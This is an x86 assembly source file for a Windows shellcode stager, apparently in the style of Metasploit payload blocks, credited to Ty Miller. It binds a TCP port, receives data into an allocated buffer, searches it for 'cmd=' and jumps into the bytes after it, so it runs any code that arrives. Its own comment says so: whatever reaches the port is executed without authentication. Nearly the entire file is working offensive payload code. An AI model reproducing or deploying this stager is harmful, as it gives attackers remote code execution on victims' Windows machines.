;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]

;INPUT: EBP is block_api.

%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
			 ; Input: EBP must be the address of 'api_call'.
			 ; Output: EDI will be the newly connected client's socket
			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)

%include "src/block_virtualalloc.asm"
			 ; Input: None
			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
			 ; Clobbers: EAX, EBX, ECX, EDX

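  mov esi, eax		 ; ESI = buffer base; api_call clobbers EAX, ESI survives it

;-----------------------------------------------------------------------------;
; Stage loader.
; In:  EBP = api_call, EDI = connected client socket (from block_bind_tcp),
;      EAX = buffer of 0x1000 bytes, EBX = 0x1000 (from block_virtualalloc)
; Out: never returns - jumps into the received stage, or falls into no_stage
; Relies on EBX/ESI/EDI surviving api_call, exactly as the two included blocks
; already assume (EBX is consumed after the VirtualAlloc call, EDI/ESI after
; recv). The buffer must be executable since we jump into it.
; SECURITY: whatever arrives on the socket is executed as code with no
; authentication or integrity check - anyone who can reach the bound port can
; deliver a stage. The stage is also limited to a single recv() of at most
; 0x1000 bytes, so a larger or fragmented stage is truncated.
;-----------------------------------------------------------------------------;

recv:                    ; Receive the web request containing the stage
  push byte 0		 ; flags
  push ebx		 ; len = 0x1000, size of the allocated buffer
  push esi		 ; buf = start of our allocated buffer
  push edi		 ; s   = external (client) socket
  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
  call ebp               ; eax = recv( external_socket, buffer, 0x1000, 0 );
  test eax, eax
  jle no_stage           ; 0 = peer closed, SOCKET_ERROR (-1) = failure
  mov ebx, eax		 ; EBX = bytes received (EBX survives api_call, EAX does not)

close_handle:
  push edi		 ; hObject: external socket (no longer needed)
  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
  call ebp		 ; CloseHandle( external_socket )

find_cmd:		 ; Search the received bytes (only) for "cmd="
  sub ebx, 4		 ; EBX = last offset at which a 4-byte "cmd=" can start
  jb no_stage            ; fewer than 4 bytes received: cannot contain "cmd="
  lea ebx, [esi + ebx]   ; EBX = address of the last candidate position
.scan:
  cmp dword [esi], 0x3d646d63   ; does ESI point to "cmd="?
  je cmd_found           ; yes - the stage follows it
  cmp esi, ebx
  jae no_stage           ; every candidate in the received data checked
  inc esi                ; next byte of the request
  jmp short .scan
cmd_found:               ; ESI -> "cmd=" ... MAY fail if the command is cut off
  add esi, byte 4	 ; skip "cmd="; 'byte' forces the 3-byte imm8 encoding (83 C6 04)
  jmp esi		 ; jump to our stage payload

no_stage:                ; recv failed/closed, <4 bytes, or no "cmd=" in the data
  ; TODO(review): exit cleanly through api_call instead; until then fail fast
  ; with #UD rather than scanning past the end of the buffer.
  ud2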


